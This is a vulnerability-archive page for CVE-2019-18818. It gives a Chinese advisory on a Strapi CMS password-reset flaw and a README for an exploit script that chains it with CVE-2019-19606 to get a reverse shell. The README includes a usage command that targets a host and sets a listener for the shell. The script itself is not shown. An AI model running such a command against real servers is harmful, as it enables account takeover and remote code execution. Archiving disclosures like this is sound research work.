Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-18818 PoC — strapi 授权问题漏洞

Source
Associated Vulnerability
Title:strapi 授权问题漏洞 (CVE-2019-18818)
Description:strapi是一套开源的无头内容管理系统(CMS)。 strapi 3.0.0-beta.17.5之前版本中存在安全漏洞,该漏洞源于程序没有正确处理packages/strapi-admin/controllers/Auth.js和packages/strapi-plugin-users-permissions/controllers/Auth.js文件中的密码重置。目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告。
Description
CVE-2019-18818/19606 Strapi RCE
Readme
# Strapi CMS CVE-2019-18818 and 19606 

Blind Remote Code Execution of Strapi CMS Version 3.0.0-beta.17.7 and earlier to get reverse shell

## Getting Started

### Executing program

* Using python3
```
python3 strapi_exp.py -t http://strapi.hack/ -e fake@email.com -p new_password -lhost 127.0.0.1 -lport 9001
```

## Help

Help prompt
```
python3 strapi_exp.py -h
```

## Disclaimer
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.
File Snapshot

[4.0K] /data/pocs/2a4e960d32d8d6b14a60add00f794a9e5721174a ├── [ 860] README.md └── [3.8K] strapi_exp.py 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.